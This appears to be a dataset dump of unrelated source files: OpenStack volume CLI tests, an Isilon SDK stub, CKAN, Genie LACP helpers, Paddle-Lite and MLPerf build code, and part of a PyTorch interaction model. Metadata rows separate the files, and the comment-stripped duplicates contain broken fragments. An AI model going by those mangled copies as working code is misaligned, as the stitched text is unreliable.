'--description', volume_fakes.volume_description,
'--type', volume_fakes.volume_type,
'--availability-zone', volume_fakes.volume_zone,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('description', volume_fakes.volume_description),
('type', volume_fakes.volume_type),
('availability_zone', volume_fakes.volume_zone),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
volume_fakes.volume_description,
volume_fakes.volume_type,
None,
None,
volume_fakes.volume_zone,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_id(self):
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_id,
'--user', identity_fakes.user_id,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_id),
('user', identity_fakes.user_id),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_name(self):
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_name,
'--user', identity_fakes.user_name,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_name),
('user', identity_fakes.user_name),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_properties(self):
arglist = [
'--property', 'Alpha=a',
'--property', 'Beta=b',
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('property', {'Alpha': 'a', 'Beta': 'b'}),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
{'Alpha': 'a', 'Beta': 'b'},
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_id(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_id,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_id),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_name(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_name,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_name),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
class TestVolumeSet(TestVolume):
def setUp(self):
super(TestVolumeSet, self).setUp()
self.volumes_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.volumes_mock.update.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.cmd = volume.SetVolume(self.app, None)
def test_volume_set_no_options(self):
arglist = [
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("No changes requested\n",
self.app.log.messages.get('error'))
def test_volume_set_name(self):
arglist = [
'--name', 'qwerty',
volume_fakes.volume_name,
]
verifylist = [
('name', 'qwerty'),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
kwargs = {
'display_name': 'qwerty',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_description(self):
arglist = [
'--description', 'new desc',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', 'new desc'),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
kwargs = {
'display_description': 'new desc',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_size(self):
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
size = 130
self.volumes_mock.extend.assert_called_with(
volume_fakes.volume_id,
size
)
def test_volume_set_size_smaller(self):
arglist = [
'--size', '100',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 100),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("New size must be greater than %s GB" %
volume_fakes.volume_size,
self.app.log.messages.get('error'))
def test_volume_set_size_not_available(self):
self.volumes_mock.get.return_value.status = 'error'
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("Volume is in %s state, it must be available before "
"size can be extended" % 'error',
self.app.log.messages.get('error'))
def test_volume_set_property(self):
arglist = [
'--property', 'myprop=myvalue',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', {'myprop': 'myvalue'}),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
metadata = {
'myprop': 'myvalue'
}
self.volumes_mock.set_metadata.assert_called_with(
volume_fakes.volume_id,
metadata
)
| true | true |
f732611a1a2ab486119fd62c51262868f3c65886 | 920 | py | Python | isi_sdk_8_1_1/test/test_hdfs_racks_extended.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_1_1/test/test_hdfs_racks_extended.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_1_1/test/test_hdfs_racks_extended.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 6
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.hdfs_racks_extended import HdfsRacksExtended # noqa: E501
from isi_sdk_8_1_1.rest import ApiException
class TestHdfsRacksExtended(unittest.TestCase):
"""HdfsRacksExtended unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testHdfsRacksExtended(self):
"""Test HdfsRacksExtended"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_1_1.models.hdfs_racks_extended.HdfsRacksExtended() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22.439024 | 92 | 0.71087 |
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.hdfs_racks_extended import HdfsRacksExtended
from isi_sdk_8_1_1.rest import ApiException
class TestHdfsRacksExtended(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testHdfsRacksExtended(self):
s
if __name__ == '__main__':
unittest.main()
| true | true |
f73261dcada28847fe886f6d9f0b31bf935869e2 | 723 | py | Python | ckanext/example_iconfigurer/controller.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 2 | 2015-07-17T19:09:52.000Z | 2017-08-30T20:23:44.000Z | ckanext/example_iconfigurer/controller.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 12 | 2015-01-19T18:03:56.000Z | 2016-04-11T16:40:33.000Z | ckanext/example_iconfigurer/controller.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 3 | 2015-03-31T06:19:42.000Z | 2016-06-27T15:32:28.000Z | import ckan.lib.base as base
import ckan.lib.helpers as helpers
render = base.render
class MyExtController(base.BaseController):
def config_one(self):
'''Render the config template with the first custom title.'''
return render('admin/myext_config.html',
extra_vars={'title': 'My First Config Page'})
def config_two(self):
'''Render the config template with the second custom title.'''
return render('admin/myext_config.html',
extra_vars={'title': 'My Second Config Page'})
def build_extra_admin_nav(self):
'''Return results of helpers.build_extra_admin_nav for testing.'''
return helpers.build_extra_admin_nav()
| 31.434783 | 74 | 0.662517 | import ckan.lib.base as base
import ckan.lib.helpers as helpers
render = base.render
class MyExtController(base.BaseController):
def config_one(self):
return render('admin/myext_config.html',
extra_vars={'title': 'My First Config Page'})
def config_two(self):
return render('admin/myext_config.html',
extra_vars={'title': 'My Second Config Page'})
def build_extra_admin_nav(self):
return helpers.build_extra_admin_nav()
| true | true |
f73261fd8815ad358fea1b0a2e1346d8c7efae13 | 4,929 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/lacp/get.py | CiscoTestAutomation/genielibs | becee8a1a85f4973e00859e3244e2c8fe45a394c | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/lacp/get.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/lacp/get.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | # Python
import logging
# Genie
from genie.metaparser.util.exceptions import SchemaEmptyParserError
log = logging.getLogger(__name__)
def get_lacp_member(device, port_channel, count, member, intf_list, internal=False):
""" This API parse's 'show lacp internal/neighbor' commands and return requested member
Args:
device (`obj`): Device object
port_channel (`str`): Port channel name
count (`int`): Required interface count
member (`str`): Specify one of them to search ‘interface’, ‘port_num’, ‘oper_key’ or ‘partner_id’
ex.) member=‘interface’
intf_list(`list'): List of interfaces
internal (`bool`): True = internal command and False = neighbor command
Returns:
If success, returns member value or None
"""
if (internal == True):
out = device.parse("show lacp internal")
else:
out = device.parse("show lacp neighbor")
port_channel = port_channel.capitalize()
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf][member]:
if member == "partner_id":
res = out["interfaces"][port_channel]["members"][intf][member]
#The example value in res: 50f7.22b2.f200
res1 = ''.join([res[i] for i in range(len(res)) if res[i] != '.'])
#The example value in res1: 50f722b2f200
res2 = ':'.join(res1[i:i + 2] for i in range(0, len(res1), 2))
#The example value in res2: 50.f7.22.b2.f2.00
return res2
elif member == "interface":
ifs = out["interfaces"][port_channel]["members"][intf][member]
if ifs == intf_list[count]:
return ifs
else:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
if ifs == intf_list[count]:
return out["interfaces"][port_channel]["members"][intf][member]
return None
def get_lacp_sys_id(device):
""" This API parse's 'show lacp sys-id' command and return sys id
Args:
device (`obj`): Device object
Returns:
Returns system id
"""
res = device.execute("show lacp sys-id")
#cli output for 'show lacp sys-id' example res: 32768, 70d3.7984.aa80
res = ''.join([res[i] for i in range(len(res)) if i > 6])
#Now the value in res: 70d3.7984.aa80
res1 = ''.join([res[i] for i in range(len(res)) if res[i] != '.'])
#Now the value in res1 : 70d37984aa80
sys_id = ':'.join(res1[i:i + 2] for i in range(0, len(res1), 2))
#After adding dots at required places sys id as 70:d3:79:84:aa:80
return sys_id
def get_lacp_intf_count(device, port_channel):
""" This API parse 'show lacp internal' command and return number of member interfaces
Args:
device (`obj`): Device object
port_channel (`str`): Port channel name
Returns:
Returns interface count
"""
try:
out = device.parse("show lacp internal")
except SchemaEmptyParserError:
return 0
port_channel = port_channel.capitalize()
count = 0
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf]:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
count = count + 1
return count
def get_lacp_intf_list(device, port_channel):
""" This API parse 'show lacp internal' command and return interface list
Args:
device (`obj`): Device object
port_channel (`str`): Port channel name
Returns:
Returns interface list
"""
try:
out = device.parse("show lacp internal")
except SchemaEmptyParserError:
return []
port_channel = port_channel.capitalize()
intf_list = []
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf]:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
intf_list.append(ifs)
return intf_list
| 37.625954 | 109 | 0.571313 |
import logging
from genie.metaparser.util.exceptions import SchemaEmptyParserError
log = logging.getLogger(__name__)
def get_lacp_member(device, port_channel, count, member, intf_list, internal=False):
if (internal == True):
out = device.parse("show lacp internal")
else:
out = device.parse("show lacp neighbor")
port_channel = port_channel.capitalize()
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf][member]:
if member == "partner_id":
res = out["interfaces"][port_channel]["members"][intf][member]
res1 = ''.join([res[i] for i in range(len(res)) if res[i] != '.'])
res2 = ':'.join(res1[i:i + 2] for i in range(0, len(res1), 2))
return res2
elif member == "interface":
ifs = out["interfaces"][port_channel]["members"][intf][member]
if ifs == intf_list[count]:
return ifs
else:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
if ifs == intf_list[count]:
return out["interfaces"][port_channel]["members"][intf][member]
return None
def get_lacp_sys_id(device):
res = device.execute("show lacp sys-id")
res = ''.join([res[i] for i in range(len(res)) if i > 6])
res1 = ''.join([res[i] for i in range(len(res)) if res[i] != '.'])
sys_id = ':'.join(res1[i:i + 2] for i in range(0, len(res1), 2))
return sys_id
def get_lacp_intf_count(device, port_channel):
try:
out = device.parse("show lacp internal")
except SchemaEmptyParserError:
return 0
port_channel = port_channel.capitalize()
count = 0
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf]:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
count = count + 1
return count
def get_lacp_intf_list(device, port_channel):
try:
out = device.parse("show lacp internal")
except SchemaEmptyParserError:
return []
port_channel = port_channel.capitalize()
intf_list = []
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf]:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
intf_list.append(ifs)
return intf_list
| true | true |
f7326241d185da508ae499d8b06d8fa4296a28b9 | 1,626 | py | Python | lite/tests/unittest_py/op/backends/x86/test_gelu_op.py | laiou/Paddle-Lite | a99080a48186ec7df546d77d39db58d84d1dda3e | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/backends/x86/test_gelu_op.py | laiou/Paddle-Lite | a99080a48186ec7df546d77d39db58d84d1dda3e | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/backends/x86/test_gelu_op.py | laiou/Paddle-Lite | a99080a48186ec7df546d77d39db58d84d1dda3e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../../common')
sys.path.append('../../../')
import test_gelu_op_base
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
class TestGeluOp(AutoScanTest):
def is_program_valid(self, program_config: ProgramConfig) -> bool:
return True
def sample_program_configs(self, draw):
return test_gelu_op_base.sample_program_configs(draw)
def sample_predictor_configs(self):
config = CxxConfig()
config.set_valid_places({Place(TargetType.X86, PrecisionType.FP32, DataLayoutType.NCHW)})
yield config, ["gelu"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main()
| 33.875 | 125 | 0.741697 |
import sys
sys.path.append('../../common')
sys.path.append('../../../')
import test_gelu_op_base
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
class TestGeluOp(AutoScanTest):
def is_program_valid(self, program_config: ProgramConfig) -> bool:
return True
def sample_program_configs(self, draw):
return test_gelu_op_base.sample_program_configs(draw)
def sample_predictor_configs(self):
config = CxxConfig()
config.set_valid_places({Place(TargetType.X86, PrecisionType.FP32, DataLayoutType.NCHW)})
yield config, ["gelu"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main()
| true | true |
f7326364052f70b968fe2f687a12024f1f20264d | 1,057 | py | Python | agent/indy_catalyst_agent/messaging/connections/messages/connection_response.py | mikelodder7/indy-catalyst | 5e80d8d6764144303b7ef1851aee32291bcb2d98 | [
"Apache-2.0"
] | null | null | null | agent/indy_catalyst_agent/messaging/connections/messages/connection_response.py | mikelodder7/indy-catalyst | 5e80d8d6764144303b7ef1851aee32291bcb2d98 | [
"Apache-2.0"
] | null | null | null | agent/indy_catalyst_agent/messaging/connections/messages/connection_response.py | mikelodder7/indy-catalyst | 5e80d8d6764144303b7ef1851aee32291bcb2d98 | [
"Apache-2.0"
] | null | null | null | """
Represents a connection response message
"""
from marshmallow import fields
from ...agent_message import AgentMessage, AgentMessageSchema
from ..message_types import CONNECTION_RESPONSE
from ....models.connection_detail import ConnectionDetail, ConnectionDetailSchema
HANDLER_CLASS = (
"indy_catalyst_agent.messaging.connections.handlers."
+ "connection_response_handler.ConnectionResponseHandler"
)
class ConnectionResponse(AgentMessage):
""" """
class Meta:
""" """
handler_class = HANDLER_CLASS
schema_class = "ConnectionResponseSchema"
message_type = CONNECTION_RESPONSE
def __init__(self, *, connection: ConnectionDetail = None, **kwargs):
super(ConnectionResponse, self).__init__(**kwargs)
self.connection = connection
class ConnectionResponseSchema(AgentMessageSchema):
""" """
class Meta:
""" """
model_class = ConnectionResponse
signed_fields = ("connection",)
connection = fields.Nested(ConnectionDetailSchema, required=True)
| 25.166667 | 81 | 0.717124 |
from marshmallow import fields
from ...agent_message import AgentMessage, AgentMessageSchema
from ..message_types import CONNECTION_RESPONSE
from ....models.connection_detail import ConnectionDetail, ConnectionDetailSchema
HANDLER_CLASS = (
"indy_catalyst_agent.messaging.connections.handlers."
+ "connection_response_handler.ConnectionResponseHandler"
)
class ConnectionResponse(AgentMessage):
class Meta:
handler_class = HANDLER_CLASS
schema_class = "ConnectionResponseSchema"
message_type = CONNECTION_RESPONSE
def __init__(self, *, connection: ConnectionDetail = None, **kwargs):
super(ConnectionResponse, self).__init__(**kwargs)
self.connection = connection
class ConnectionResponseSchema(AgentMessageSchema):
class Meta:
model_class = ConnectionResponse
signed_fields = ("connection",)
connection = fields.Nested(ConnectionDetailSchema, required=True)
| true | true |
f73263c4c1df5dfb8107b488aaa76084d7b77bb6 | 1,842 | py | Python | loadgen/setup.py | sf-wind/inference | ae7fa59ce55cd68dfd474149df417557a69704a9 | [
"Apache-2.0"
] | null | null | null | loadgen/setup.py | sf-wind/inference | ae7fa59ce55cd68dfd474149df417557a69704a9 | [
"Apache-2.0"
] | null | null | null | loadgen/setup.py | sf-wind/inference | ae7fa59ce55cd68dfd474149df417557a69704a9 | [
"Apache-2.0"
] | null | null | null | """MLPerf Inference LoadGen python bindings.
Creates a module that python can import.
All source files are compiled by python's C++ toolchain without depending
on a loadgen lib.
This setup.py can be used stand-alone, without the use of an external
build system. This will polute your source tree with output files
and binaries. Use one of the gn build targets instead if you want
to avoid poluting the source tree.
"""
from setuptools import setup, Extension
from version_generator import generate_loadgen_version_definitions
generated_version_source_filename = "generated/version.cc"
generate_loadgen_version_definitions(generated_version_source_filename)
public_headers = [
"loadgen.h",
"query_sample.h",
"query_sample_library.h",
"system_under_test.h",
"test_settings.h",
]
lib_headers = [
"logging.h",
"test_settings_internal.h",
"trace_generator.h",
"utils.h",
"version.h",
]
lib_sources = [
"loadgen.cc",
"logging.cc",
]
mlperf_loadgen_headers = public_headers + lib_headers
mlperf_loadgen_sources_no_gen = lib_sources
mlperf_loadgen_sources = \
mlperf_loadgen_sources_no_gen + [generated_version_source_filename]
sources = [
"bindings/python_api.cc",
"generated/version.cc",
"loadgen.cc",
"logging.cc",
]
mlperf_loadgen_module = Extension('mlperf_loadgen',
define_macros = [('MAJOR_VERSION', '0'),
('MINOR_VERSION', '5')],
include_dirs = [ '.', '../third_party/pybind/include' ],
sources = mlperf_loadgen_sources + sources,
depends = mlperf_loadgen_headers)
setup (name = 'mlperf_loadgen',
version = '0.5a0',
description = 'MLPerf Inference LoadGen python bindings',
url = 'https://mlperf.org',
ext_modules = [mlperf_loadgen_module])
| 28.78125 | 76 | 0.698697 |
from setuptools import setup, Extension
from version_generator import generate_loadgen_version_definitions
generated_version_source_filename = "generated/version.cc"
generate_loadgen_version_definitions(generated_version_source_filename)
public_headers = [
"loadgen.h",
"query_sample.h",
"query_sample_library.h",
"system_under_test.h",
"test_settings.h",
]
lib_headers = [
"logging.h",
"test_settings_internal.h",
"trace_generator.h",
"utils.h",
"version.h",
]
lib_sources = [
"loadgen.cc",
"logging.cc",
]
mlperf_loadgen_headers = public_headers + lib_headers
mlperf_loadgen_sources_no_gen = lib_sources
mlperf_loadgen_sources = \
mlperf_loadgen_sources_no_gen + [generated_version_source_filename]
sources = [
"bindings/python_api.cc",
"generated/version.cc",
"loadgen.cc",
"logging.cc",
]
mlperf_loadgen_module = Extension('mlperf_loadgen',
define_macros = [('MAJOR_VERSION', '0'),
('MINOR_VERSION', '5')],
include_dirs = [ '.', '../third_party/pybind/include' ],
sources = mlperf_loadgen_sources + sources,
depends = mlperf_loadgen_headers)
setup (name = 'mlperf_loadgen',
version = '0.5a0',
description = 'MLPerf Inference LoadGen python bindings',
url = 'https://mlperf.org',
ext_modules = [mlperf_loadgen_module])
| true | true |
f732658d5a149ab114e15ead4d028cafb022c2a4 | 18,700 | py | Python | models.py | zedian/esm | 9d2b50cd96753e8a703ca810e875c9e887047ed9 | [
"MIT"
] | null | null | null | models.py | zedian/esm | 9d2b50cd96753e8a703ca810e875c9e887047ed9 | [
"MIT"
] | null | null | null | models.py | zedian/esm | 9d2b50cd96753e8a703ca810e875c9e887047ed9 | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
from torch import nn
import torch.utils.data as Data
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import collections
import math
import copy
torch.manual_seed(1)
np.random.seed(1)
class BIN_Interaction_Flat(nn.Sequential):
'''
Interaction Network with 2D interaction map
'''
def __init__(self, **config):
super(BIN_Interaction_Flat, self).__init__()
self.max_d = config['max_drug_seq']
self.max_p = config['max_protein_seq']
self.emb_size = config['emb_size']
self.dropout_rate = config['dropout_rate']
#densenet
self.scale_down_ratio = config['scale_down_ratio']
self.growth_rate = config['growth_rate']
self.transition_rate = config['transition_rate']
self.num_dense_blocks = config['num_dense_blocks']
self.kernal_dense_size = config['kernal_dense_size']
self.batch_size = config['batch_size']
self.input_dim_drug = config['input_dim_drug']
self.input_dim_target = config['input_dim_target']
self.gpus = torch.cuda.device_count()
self.n_layer = 2
#encoder
self.hidden_size = config['emb_size']
self.intermediate_size = config['intermediate_size']
self.num_attention_heads = config['num_attention_heads']
self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
self.hidden_dropout_prob = config['hidden_dropout_prob']
self.flatten_dim = config['flat_dim']
# specialized embedding with positional one
self.demb = Embeddings(self.input_dim_drug, self.emb_size, self.max_d, self.dropout_rate)
self.pemb = Embeddings(self.input_dim_target, self.emb_size, self.max_p, self.dropout_rate)
self.d_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
self.p_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
